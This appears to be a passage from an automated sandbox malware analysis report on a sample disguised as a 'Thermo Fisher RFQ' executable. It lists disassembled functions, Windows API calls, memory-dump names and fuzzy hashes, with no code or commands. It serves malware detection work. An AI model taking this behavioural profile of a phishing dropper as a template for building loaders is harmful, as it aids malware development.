Instruction Fuzzy Hash: 48E04F32A14514ABCB18CBA8EDD086E73B6FB84310310453FE502B36A4C6789C00CB58

Function 00406948 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040363F,?,?,?,?,?,?,?,?,?), ref: 0040695A
GetProcAddress.KERNEL32(00000000,?), ref: 00406975

Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040693E

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769

Function 00406044 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00406048
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 00405B02 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00405B08
GetLastError.KERNEL32(?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00405B16

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D

Function 6FE72B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 6FE72C57

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b50cd1474a003202013d072df706720d04fa5d76d5618025fa6112ab15e455f5
Instruction ID: ac8bab2c51b7fe06c381408940bb8652c9dc88e4dd3bcbbadb2c32a4a62ed965
Opcode Fuzzy Hash: b50cd1474a003202013d072df706720d04fa5d76d5618025fa6112ab15e455f5
Instruction Fuzzy Hash: 01417E71904714DBDB30DF68D985B593FB5EB66328F30882AE5048A240DB38B891EFA1

Function 004028B6 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4

Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 874a48f5052de35ce3f5d68bebafa1d1d6b4bc0d038a260f4494356ae22f2f83
Instruction ID: d8afcb7e31c577c7df5a47bf7b189458025ebbcb83da75e60b69e678f76aa364
Opcode Fuzzy Hash: 874a48f5052de35ce3f5d68bebafa1d1d6b4bc0d038a260f4494356ae22f2f83
Instruction Fuzzy Hash: E8E06D71904104AADB00EFA5AE498AE77B9EB80349B20443FF101B00E9C67859109A3D

Function 004023D7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 05d014058449bd4b547e5342c092477e81e00b6c136499da1acfa5e54e0b5503
Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
Opcode Fuzzy Hash: 05d014058449bd4b547e5342c092477e81e00b6c136499da1acfa5e54e0b5503
Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D

Function 0040175A Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040176E

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 90ae4191cc2eee50ed17e5dc204d1be3e337bf975627a90f163dd72e6c21e694
Instruction ID: 5ef6c9dc075d7657941f8fe9075485116ee4ddb5350d9d3ef67c2e6f18a0d880
Opcode Fuzzy Hash: 90ae4191cc2eee50ed17e5dc204d1be3e337bf975627a90f163dd72e6c21e694
Instruction Fuzzy Hash: 6FE04871204101AAE700DB94DD49EAF7768DF50358F20813BE511A60D1E6B49914972D

Function 004063EF Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406418

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: 1ec48b264e911f442ad562827ea2aeba8bdc9c692846981259ff7ce92a87d17c
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 60E0BF72110109BFEF095F90DD0AD7B761DE704210B01452EF906D4051E6B5A9305674

Function 004060C7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004034E4,00000000,00000000,0040332B,000000FF,?,00000000,00000000,00000000), ref: 004060DB

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8

Function 004060F6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,0040349A,00000000,00793700,000000FF,00793700,000000FF,000000FF,?,00000000), ref: 0040610A

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8

Function 6FE72A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6FE7505C,?,?,6FE7504C), ref: 6FE72A9D

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0ae080389d0589eee9b08c04dc3775ba0dc985683f3eab0bc5005dcf86d009f0
Instruction ID: e2031979262511a7493212226849cd5f616a3c75889a7e9bf3e9c7291dba9fb2
Opcode Fuzzy Hash: 0ae080389d0589eee9b08c04dc3775ba0dc985683f3eab0bc5005dcf86d009f0
Instruction Fuzzy Hash: 5CF0C2B0904BA0DEDB60CF3C8444B093FE2BB1B324B24452FE188D6244E7347465EFA1

Function 00402419 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: af8866ea374093282caf300f4873787412238c1fbfbe0191187a71e12ad24201
Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
Opcode Fuzzy Hash: af8866ea374093282caf300f4873787412238c1fbfbe0191187a71e12ad24201
Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759

Function 004063C1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040644F,?,?,?,?,Call,?,00000000), ref: 004063E5

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4

Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015D3

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9d343ac4382d2e8cff30bc3796d860aaf3667ae62c4bad401f9ffbe6388ce1d7
Instruction ID: 2b9d1094eaa3a8f74ec8242088029bd2eb80cc7fbaada08ad61a8f4613916ca8
Opcode Fuzzy Hash: 9d343ac4382d2e8cff30bc3796d860aaf3667ae62c4bad401f9ffbe6388ce1d7
Instruction Fuzzy Hash: 8BD05B72B08101D7DB00DBE89B48A9E77609B50368B30C53BD111F11E4D6B8C555A71D

